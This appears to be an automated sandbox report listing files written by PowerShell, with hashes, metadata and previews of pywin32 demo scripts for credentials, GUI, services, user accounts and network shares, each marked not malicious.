                                                                                                                                                                                                            SHA-512:D4B87DF7450D942BB84C40346025D05AA96FE4F5A6C87E57EB3CE71AB7E5CBCBE1E0BB494AB8CC297E47A69A76766CBFCE7EE25E6CE373A6CA27A6428F79A8AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Demonstrates prompting for credentials, saving, and loggging on with marshalled credential...Also shows how to load user's profile.."""....import win32api..import win32con..import win32cred..import win32net..import win32profile..import win32security....## Prompt for a username/pwd for local computer..uiinfo = {.. "MessageText": "Enter credentials for local machine",.. "CaptionText": "win32cred_demo.py",..}..target, pwd, save = win32cred.CredUIPromptForCredentials(.. TargetName=win32api.GetComputerName(),.. AuthError=0,.. Flags=win32cred.CREDUI_FLAGS_DO_NOT_PERSIST.. | win32cred.CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX,.. Save=False,.. UiInfo=uiinfo,..)....attrs = [.. {"Keyword": "attr1", "Flags": 0, "Value": "unicode data"},.. {"Keyword": "attr2", "Flags": 0, "Value": b"character data"},..]..cred = {.. "Comment": "Created by win32cred_demo.py",.. "UserName": target,.. "TargetAlias": None,.. "TargetName": target,.. "CredentialBlob": pwd,.. "F
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1407
                                                                                                                                                                                                            Entropy (8bit):4.855149431792049
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:qIRzij1ZYUkzg41y17MCggAZU+7VJhVwf3AUw/LsnaRBwCDTVtq6nG7+CDTCT/bI:d8kzN1GgCgq/fwprVpqAbchCc
                                                                                                                                                                                                            MD5:DD78909894325617AC60F5D22468151D
                                                                                                                                                                                                            SHA1:CA23B88F44B7B8EF290EF0F82D12DFD73D3EB709
                                                                                                                                                                                                            SHA-256:F9AE63FE8C2B705A917D9977C551746E83239138F8A7C1C0A7766B2426E7A055
                                                                                                                                                                                                            SHA-512:CEFBBB650BA31AD6BB26BF42C7EA68AE56B4556DDBE35C8EBC412587E2AE88813A3C11B175DF4970C5AC0D173B9345CCBEE06D19292414EFD51924211FC53D97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This is a "demo" of win32file - it used to be more a test case than a..# demo, so has been moved to the test directory.....import os....# Please contribute your favourite simple little demo...import win32api..import win32con..import win32file......# A very simple demo - note that this does no more than you can do with..# builtin Python file objects, so for something as simple as this, you..# generally *should* use builtin Python objects. Only use win32file etc..# when you need win32 specific features not available in Python...def SimpleFileDemo():.. testName = os.path.join(win32api.GetTempPath(), "win32file_demo_test_file").. if os.path.exists(testName):.. os.unlink(testName).. # Open the file for writing... handle = win32file.CreateFile(.. testName, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None.. ).. test_data = b"Hello\0there".. win32file.WriteFile(handle, test_data).. handle.Close().. # Open it for reading... handle = w
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5205
                                                                                                                                                                                                            Entropy (8bit):4.908980352607728
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ITV8tW05+uxahNjxTyWPFXpAKMAThMAS37TyKw2VZ2v8Ab2deTecZ2nNu:I5wbxahvT/V/q7THw2X2vZb2deTeU2ng
                                                                                                                                                                                                            MD5:7AC76DB38926BA920907BBB93979E808
                                                                                                                                                                                                            SHA1:05FAE2F363785ABA4660CFD4C3C1305B62D00DFC
                                                                                                                                                                                                            SHA-256:8170CB618E66E3DC8760A68FD75115A2D2A10330F2EE1BA96ED9C6D60228ECA4
                                                                                                                                                                                                            SHA-512:CE9998D6F28593AC38621C5B00745942FF4AF3837B00BB3DC2CA07179A304566529D72A26039C95871F2F85490239524F34A7369F61AB2EE798B978EC5ADFD22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# The start of a win32gui generic demo...# Feel free to contribute more demos back ;-)....import math..import random..import time....import win32api..import win32con..import win32gui......def _MyCallback(hwnd, extra):.. hwnds, classes = extra.. hwnds.append(hwnd).. classes[win32gui.GetClassName(hwnd)] = 1......def TestEnumWindows():.. windows = [].. classes = {}.. win32gui.EnumWindows(_MyCallback, (windows, classes)).. print(.. "Enumerated a total of %d windows with %d classes".. % (len(windows), len(classes)).. ).. if "tooltips_class32" not in classes:.. print("Hrmmmm - I'm very surprised to not find a 'tooltips_class32' class.")......def OnPaint_1(hwnd, msg, wp, lp):.. dc, ps = win32gui.BeginPaint(hwnd).. win32gui.SetGraphicsMode(dc, win32con.GM_ADVANCED).. br = win32gui.CreateSolidBrush(win32api.RGB(255, 0, 0)).. win32gui.SelectObject(dc, br).. angle = win32gui.GetWindowLong(hwnd, win32con.GWL_USERDATA).. win32gui.Set
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3936
                                                                                                                                                                                                            Entropy (8bit):5.053997492626868
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q/aJ+p3P1TecA+7/YDZmv2HYcCCGnaDcUSboVsK312vZSGjDY:q/aE/sxi/mZmv2HYhQ9MoVsS12vZdY
                                                                                                                                                                                                            MD5:C9044C9C69BEBA2CD4577E757BE9B187
                                                                                                                                                                                                            SHA1:A402FA72CCEF5BF217840D4C9ED76AF59826B491
                                                                                                                                                                                                            SHA-256:039F868F8E386AEA332DD713B6A7A39516844D639C6DBA66220088238C6B039B
                                                                                                                                                                                                            SHA-512:7AB63FA2D02BE322B053AF982293A53EA38E42CC15FA64FB644262D551C29784D4CC5F5167D0E0561FBB3D2582B9E12369EF8CB2A19D2D1148EEE9A27731231C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Demo RegisterDeviceNotification etc. Creates a hidden window to receive..# notifications. See serviceEvents.py for an example of a service doing..# that...import sys..import time....import win32api..import win32con..import win32file..import win32gui..import win32gui_struct..import winnt....# These device GUIDs are from Ioevent.h in the Windows SDK. Ideally they..# could be collected somewhere for pywin32.....GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"......# WM_DEVICECHANGE message handler...def OnDeviceChange(hwnd, msg, wp, lp):.. # Unpack the 'lp' into the appropriate DEV_BROADCAST_* structure,.. # using the self-identifying data inside the DEV_BROADCAST_HDR... info = win32gui_struct.UnpackDEV_BROADCAST(lp).. print("Device change notification:", wp, str(info)).. if (.. wp == win32con.DBT_DEVICEQUERYREMOVE.. and info.devicetype == win32con.DBT_DEVTYP_HANDLE.. ):.. # Our handle is stored away in the structure - jus
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15763
                                                                                                                                                                                                            Entropy (8bit):4.815923946286022
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lvtGZzeB+Wt/B6K9j5MEB3uq5cdVCccH8y:lv4Z4MetccH8y
                                                                                                                                                                                                            MD5:AF104B5612FEDCA393DC09795CCE4D93
                                                                                                                                                                                                            SHA1:751F0B7D2226A6262923EA0CA5CC3E5C6E7B5394
                                                                                                                                                                                                            SHA-256:1C6F2FB63F885089764C7C7B0648C6F4C42C09C0439027435F7B3C37A39F94E4
                                                                                                                                                                                                            SHA-512:9E3277204440A6D433755052B42E5923169F29D685FEFD283BC575BA7D297BE04D0FCE25B67AC3037B8674CFF58D4F5512C2828A729601E98AD0F1963A7BBC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A demo of a fairly complex dialog...#..# Features:..# * Uses a "dynamic dialog resource" to build the dialog...# * Uses a ListView control...# * Dynamically resizes content...# * Uses a second worker thread to fill the list...# * Demonstrates support for windows XP themes.....import array..import os..import queue..import struct....import commctrl..import win32api..import win32con..import win32gui..import win32gui_struct..import winerror....IDC_SEARCHTEXT = 1024..IDC_BUTTON_SEARCH = 1025..IDC_BUTTON_DISPLAY = 1026..IDC_LISTBOX = 1027....WM_SEARCH_RESULT = win32con.WM_USER + 512..WM_SEARCH_FINISHED = win32con.WM_USER + 513......class _WIN32MASKEDSTRUCT:.. def __init__(self, **kw):.. full_fmt = "".. for name, fmt, default, mask in self._struct_items_:.. self.__dict__[name] = None.. if fmt == "z":.. full_fmt += "pi".. else:.. full_fmt += fmt.. for name, val in kw.items():.. if name not in se
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16136
                                                                                                                                                                                                            Entropy (8bit):4.661244063326515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:++ffiHnqLyZq46zTSe3RKskAePn5mrjWr6X:+Vjq46zT38LkjI6
                                                                                                                                                                                                            MD5:72187030045FBA5E0FB6EE374D1A5EDD
                                                                                                                                                                                                            SHA1:C1AEBE5BD022D0DDDEF6855D5E3ACC63D1DDF7CF
                                                                                                                                                                                                            SHA-256:7468610E379C99F2D8CC5C8E78782F841C3C10C3AF2E127B329EE7A69263714F
                                                                                                                                                                                                            SHA-512:A3C579D5D10D5C1C33BFBFD03077E17635D19511DD12FC2685C76E28414893D900D4A002F997BC13AE4D084552904EBC1D5A05AABB2C62D3A52AE967F46DB362
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Demonstrates some advanced menu concepts using win32gui...# This creates a taskbar icon which has some fancy menus (but note that..# selecting the menu items does nothing useful - see win32gui_taskbar.py..# for examples of this.....# NOTE: This is a work in progress. Todo:..# * The "Checked" menu items don't work correctly - I'm not sure why...# * No support for GetMenuItemInfo.....# Based on Andy McKay's demo code.....import os..import struct..import sys....import win32con..from win32api import *..from win32gui import *..from win32gui_struct import *....this_dir = os.path.split(sys.argv[0])[0]......class MainWindow:.. def __init__(self):.. message_map = {.. win32con.WM_DESTROY: self.OnDestroy,.. win32con.WM_COMMAND: self.OnCommand,.. win32con.WM_USER + 20: self.OnTaskbarNotify,.. # owner-draw related handlers... win32con.WM_MEASUREITEM: self.OnMeasureItem,.. win32con.WM_DRAWITEM: self.OnDrawItem,.. }
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5113
                                                                                                                                                                                                            Entropy (8bit):4.813905147916572
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:85ylCdXU543y2ZRjSACk9kyasR0LPp1KMmxovvvy:suCqyC2ZJHSHsR0LPpMMvvy
                                                                                                                                                                                                            MD5:F0C9EFA23BB1CB525977FA1162319597
                                                                                                                                                                                                            SHA1:443A8DCF57D20EDF26F7CC947B5FB9BDC12434DA
                                                                                                                                                                                                            SHA-256:B2A79CBB46F6AF1369B071D7C652DF1A8153302C83C715E5B32FC9A9D9785B21
                                                                                                                                                                                                            SHA-512:975DD69AFA55089F8F6D14DC0E6F9EA9EE1B123343A66D06782F9ED92E21231461E00AF70F5645B0A9E7987D3E10094083EE9D20A549173E370122BE7117F7F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Creates a task-bar icon. Run from Python.exe to see the..# messages printed...import os..import sys....import win32api..import win32con..import win32gui..import winerror......class MainWindow:.. def __init__(self):.. msg_TaskbarRestart = win32gui.RegisterWindowMessage("TaskbarCreated").. message_map = {.. msg_TaskbarRestart: self.OnRestart,.. win32con.WM_DESTROY: self.OnDestroy,.. win32con.WM_COMMAND: self.OnCommand,.. win32con.WM_USER + 20: self.OnTaskbarNotify,.. }.. # Register the Window class... wc = win32gui.WNDCLASS().. hinst = wc.hInstance = win32api.GetModuleHandle(None).. wc.lpszClassName = "PythonTaskbarDemo".. wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW.. wc.hCursor = win32api.LoadCursor(0, win32con.IDC_ARROW).. wc.hbrBackground = win32con.COLOR_WINDOW.. wc.lpfnWndProc = message_map # could also specify a wndproc..... # Don't blow up
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9248
                                                                                                                                                                                                            Entropy (8bit):4.488868766657033
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:LhxQsspJ4WW0okDf/xZQDDGfV52wVqg58IDIogy:LFkLJY/3g58O
                                                                                                                                                                                                            MD5:F177068F8D19A6C04B55868F3E2CC3D6
                                                                                                                                                                                                            SHA1:DDB044DBB56C817BD405A16573BF0FC659014BF3
                                                                                                                                                                                                            SHA-256:8D40FF821317D48992914FCCC099C37490DFB1B1BD76A6E20C0F2241325BF493
                                                                                                                                                                                                            SHA-512:4A41AF34203FEFB89B9979E06AF2DEBD986F628AD78391B9C51F4D209BB845DEDD04EADE4E9AC61DBB0AF33A8E4EE385E47D296848DD15DBD9C09A586D13533A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import getopt..import sys..import traceback..from collections.abc import Callable....import win32api..import win32net..import win32netcon..import win32security....verbose_level = 0....server = None # Run on local machine.......def verbose(msg):.. if verbose_level:.. print(msg)......def CreateUser():.. "Creates a new test user, then deletes the user".. testName = "PyNetTestUser".. try:.. win32net.NetUserDel(server, testName).. print("Warning - deleted user before creating it!").. except win32net.error:.. pass.... d = {}.. d["name"] = testName.. d["password"] = "deleteme".. d["priv"] = win32netcon.USER_PRIV_USER.. d["comment"] = "Delete me - created by Python test code".. d["flags"] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT.. win32net.NetUserAdd(server, 1, d).. try:.. try:.. win32net.NetUserChangePassword(server, testName, "wrong", "new").. print("ERROR: NetUserChangePassword wo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2889
                                                                                                                                                                                                            Entropy (8bit):4.959262689698675
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:MVhumvLaYSbfNQoOjPJQZGwnzSOB3x6LPGDbKIOYuu/Vi1Jl7TZB:MSeS2o4xuGwj3xEPGDeoxsn7FB
                                                                                                                                                                                                            MD5:F9E3184E940A8A0744D0576115BB2F60
                                                                                                                                                                                                            SHA1:FD75F46B083B5C943FD52C685AD31692BEAD00C0
                                                                                                                                                                                                            SHA-256:AC1B7E938B5C3DCF1DA93125F8FD13F283DFDDD0FE53D63092E8F2EA150EAE24
                                                                                                                                                                                                            SHA-512:283F5C4236823C4DBB41CDBE37766622BB08F5441C8A6561AC2037C4333E6B69F4E1E590C8D98F882AA3523E82F5E75F2551D64E92DE77C4518E4C5331554AAB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A demo of the win32rcparser module and using win32gui....import os....import commctrl..import win32api..import win32con..import win32gui..import win32rcparser....this_dir = os.path.abspath(os.path.dirname(__file__))..g_rcname = os.path.abspath(.. os.path.join(this_dir, "..", "test", "win32rcparser", "test.rc")..)....if not os.path.isfile(g_rcname):.. raise RuntimeError(f"Can't locate test.rc (should be at '{g_rcname}')")......class DemoWindow:.. def __init__(self, dlg_template):.. self.dlg_template = dlg_template.... def CreateWindow(self):.. self._DoCreate(win32gui.CreateDialogIndirect).... def DoModal(self):.. return self._DoCreate(win32gui.DialogBoxIndirect).... def _DoCreate(self, fn):.. message_map = {.. win32con.WM_INITDIALOG: self.OnInitDialog,.. win32con.WM_CLOSE: self.OnClose,.. win32con.WM_DESTROY: self.OnDestroy,.. win32con.WM_COMMAND: self.OnCommand,.. }.. return fn(0,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):602
                                                                                                                                                                                                            Entropy (8bit):4.912224927172955
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:4L5sL0MOghYAL0uC17DR/ciSSwR7lgrwB4gK/Jy:kYRhtLFe7DR/D+pQy4goy
                                                                                                                                                                                                            MD5:A8C72E1178BC4C9E27A89AD03700C473
                                                                                                                                                                                                            SHA1:0674BBE2C3FDB669FCE63F7FFC975B2A7E6BE0C5
                                                                                                                                                                                                            SHA-256:345E1013483E1AD5FE85643B456E7DC60044B4DEE9FB03C3D2BA8890BDFA1F4C
                                                                                                                                                                                                            SHA-512:C58E1DA93BF9D24EA9E3862C1411CB5552E2D8AB152509C93156D1501305BED457CEAD1663DE4778797A8D48A9DCD19D6F9033E640FE7F39995156BB141E44BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32con..import win32service......def EnumServices():.. resume = 0.. accessSCM = win32con.GENERIC_READ.. accessSrv = win32service.SC_MANAGER_ALL_ACCESS.... # Open Service Control Manager.. hscm = win32service.OpenSCManager(None, None, accessSCM).... # Enumerate Service Control Manager DB.... typeFilter = win32service.SERVICE_WIN32.. stateFilter = win32service.SERVICE_STATE_ALL.... statuses = win32service.EnumServicesStatus(hscm, typeFilter, stateFilter).. for short_name, desc, status in statuses:.. print(short_name, desc, status)......EnumServices()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1008
                                                                                                                                                                                                            Entropy (8bit):4.804897528087674
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:SIGvZ7LLzLEBqSKBkd9QNNl3gfHeyuns2NYT1J1gn0u4Hdu5W7gfFPqTkduK4PYA:GvZ7sISVd6Nb1n0zdn0fF1dh4Y++8N
                                                                                                                                                                                                            MD5:9DD39A162F28B839CDA9FBF4C693739A
                                                                                                                                                                                                            SHA1:1AB16D17CAD89AC4511319499C410A2F14427CD5
                                                                                                                                                                                                            SHA-256:3126393B8197C4E3788307DA8FA6DD4FD2AD51AA7E755785DDF33C8BEE50F0EA
                                                                                                                                                                                                            SHA-512:EFC7849B8609803091149E1C6BD7F25153EE134735E0F687A835C639E7148BE81D429C66ED81CA85EA419BA9204C35FF1FFCF215F668991252FEBE320C8894AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Finds any disconnected terminal service sessions and logs them off"""....import pywintypes..import win32ts..import winerror....sessions = win32ts.WTSEnumerateSessions(win32ts.WTS_CURRENT_SERVER_HANDLE)..for session in sessions:.. """.. WTS_CONNECTSTATE_CLASS: WTSActive,WTSConnected,WTSConnectQuery,WTSShadow,WTSDisconnected,.. WTSIdle,WTSListen,WTSReset,WTSDown,WTSInit.. """.. if session["State"] == win32ts.WTSDisconnected:.. sessionid = session["SessionId"].. username = win32ts.WTSQuerySessionInformation(.. win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, win32ts.WTSUserName.. ).. print("Logging off disconnected user:", username).. try:.. win32ts.WTSLogoffSession(win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, True).. except pywintypes.error as e:.. if e.winerror == winerror.ERROR_ACCESS_DENIED:.. print("Can't kill that session:", e.strerror).. else:..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3540
                                                                                                                                                                                                            Entropy (8bit):5.553804739165205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:C5jmNALQEjdtMuTeJFLVzB+PMqSQQxGQCzAM2EfbMzOgY:C5jmNALQEpSuaJFLVz2MPQQ0QCMJEfbt
                                                                                                                                                                                                            MD5:A987483959A0D698DD80A26862C247D8
                                                                                                                                                                                                            SHA1:3C86CFC957BFC008C5B410FBD5F58B6F542894C0
                                                                                                                                                                                                            SHA-256:955ACAFB06CB535810A33519D52D56A57EFA2914796358CDAEEF7F184D8F2484
                                                                                                                                                                                                            SHA-512:3830CF409E526EB62A149F197AD2719FBEAA3B6CEC7FC43F1F61DBCA4AFBDD0772214AEE811A1333D94D0EA1434B1C7BD3319B67222F9174C07FCB782623966B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g7........................@...sd...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.....e.....e.....d.S.)......N)...*c....................C...s....d.|...}...t...|.d...}.t.|...d.k.r.d.S.|.D.]c}.zE|.j.t.k.r+t.|.d...|.j.....t...|.....n0|.j.t.k.r9t.|.d...|.j.....n"t.|.d...|.j...d.d.....t...t.t.d.|...}.t.....t.|.|.d.......t...|.....W.q...t.j.yx..}...z.t.|.d...|.j.......W.Y.d.}.~.q.d.}.~.w.w.q.).N.. .....r....z.Have share with name:z Have generic resource with name:z.Enumerating )...endz"Couldn't enumerate this resource: )...win32wnet..WNetEnumResource..lenZ.dwDisplayTypeZ.RESOURCEDISPLAYTYPE_SHARE..print..lpRemoteName..possible_shares..appendZ.RESOURCEDISPLAYTYPE_GENERIC..WNetOpenEnum..RESOURCE_GLOBALNET..RESOURCETYPE_ANY.._doDumpHandleZ.WNetCloseEnum..error..strerror)...handle..level..indent..items..item..k..details..r.....uC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32wnet/testwnet.pyr........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3033
                                                                                                                                                                                                            Entropy (8bit):5.3783349367826006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CkW5kj6VevxRrlzGiOGlX2s41fwBTTcd5UIS9WZ8wgqbY6m2/U:CkWLVMxzGiOs2sowJE5UInZ8w/Y6NU
                                                                                                                                                                                                            MD5:46560146BBDF6C3190750AF64C89097A
                                                                                                                                                                                                            SHA1:B511E43B05E0388489519DAE2BF6F420922D4D4E
                                                                                                                                                                                                            SHA-256:86E2817211E29B6174C5A86F50297EF129D20C6631D62C749EF604FB538D49B5
                                                                                                                                                                                                            SHA-512:83A6781DC51F35BF866741718651DF34ACEC17584122B3DF2CCA894CD3CFC8A7A42ED9DD075ED766A1503FF44114A05C9A56C3688427E1CFDA7BCB0DD3A88479
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d.Z%d Z&d%Z'd&Z(d.Z)d Z*d"Z+d%Z,d'Z-e)e*B.e-B.Z.d(Z/d$Z0d.Z1d Z2d!Z3d"Z4d#Z5d)Z6d*Z7d%Z8d+Z9d,Z:d-Z;d.Z<d.Z=d Z>d"Z?d%Z@d'ZAd.ZBd/ZCd0ZDd1ZEd2ZFd3ZGd4ZHd.ZId ZJd"ZKd%ZLd'ZMd.ZNd.ZOd/ZPd.ZQd ZRd.ZSd ZTd'ZUd.ZVd.ZWd"ZXd%ZYd.ZZd Z[d.Z\d.Z]d Z^d"Z_d%Z`d5S.)6i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i....i.. .i..!.i..".i..#.i..$.i..%....................................l...............l.................................... ....@............i....i....l.......~..N)aZ.WNNC_NET_MSNETZ.WNNC_NET_LANMANZ.WNNC_NET_NETWAREZ.WNNC_NET_VINESZ.WNNC_NET_10NETZ.WNNC_NET_LOCUSZ.WNNC_NET_SUN_PC_NFSZ.WNNC_NET_LANSTEPZ.WNNC_NET_9TILESZ.WNNC_NET_LANTASTICZ.WNNC_NET_AS400Z.WNNC_NET_FTP_NFSZ.WNNC_NET_PATHWORKSZ.WNNC_NET_LIFENETZ.WNNC_NET_POWERLAN
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4407
                                                                                                                                                                                                            Entropy (8bit):4.568828858432248
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:a6he0cWDDMErumT2ch5kG6bkKa6w54Kp8tqDTThHzVM:HZcWMErxdqtw4m8tqHThTVM
                                                                                                                                                                                                            MD5:2AD99D4A30734ACEA47BB2BD41D5818E
                                                                                                                                                                                                            SHA1:17758E3D9C0D550308BCF64E1331075693B49F34
                                                                                                                                                                                                            SHA-256:437A0CEA8E84A710407FC77D4BC327C57E1D656363D6B80ACEB0D4DC9C0D40C4
                                                                                                                                                                                                            SHA-512:2083DCEB1B3D421D743F09CDA34B898DDA84691A33C205F0116D7A1B2629E27671E56533F12A96C7B6E7B3E74E34BE757C2F9DC1DD9C3C0C19EAC8B35B0791FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os....import win32api..import win32wnet..from winnetwk import *....possible_shares = []......def _doDumpHandle(handle, level=0):.. indent = " " * level.. while 1:.. items = win32wnet.WNetEnumResource(handle, 0).. if len(items) == 0:.. break.. for item in items:.. try:.. if item.dwDisplayType == RESOURCEDISPLAYTYPE_SHARE:.. print(indent + "Have share with name:", item.lpRemoteName).. possible_shares.append(item).. elif item.dwDisplayType == RESOURCEDISPLAYTYPE_GENERIC:.. print(.. indent + "Have generic resource with name:", item.lpRemoteName.. ).. else:.. # Try generic!.. print(indent + "Enumerating " + item.lpRemoteName, end=" ").. k = win32wnet.WNetOpenEnum(.. RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, item..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3293
                                                                                                                                                                                                            Entropy (8bit):4.4744838897774635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:J5V7vlfUv6t72i242B3Zhof58lE3NFJZufukBgaP1Q6dYnF6MK3lWX3yhHM:J71Uvy2i+Bphoh8lE9FJZufd6FCWXIM
                                                                                                                                                                                                            MD5:59098D73F11B7D8BB69D8FCCEC181DA3
                                                                                                                                                                                                            SHA1:C4104FA2ABC79F05DB6234B7DEFA6B11C469C1BD
                                                                                                                                                                                                            SHA-256:07FEE2CD99574C7DE4B0F960127C3D53B874A53D9A6F830450336F3913396938
                                                                                                                                                                                                            SHA-512:AB70A89A89929F42C2FC9896CD7E21B3BF640A00B12DAF5C32DA0C27249734A2414476C55C0A7B4A5613E968F56D516B8D87DE97F0ABCFC4C00B2A6F1E9DA64F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
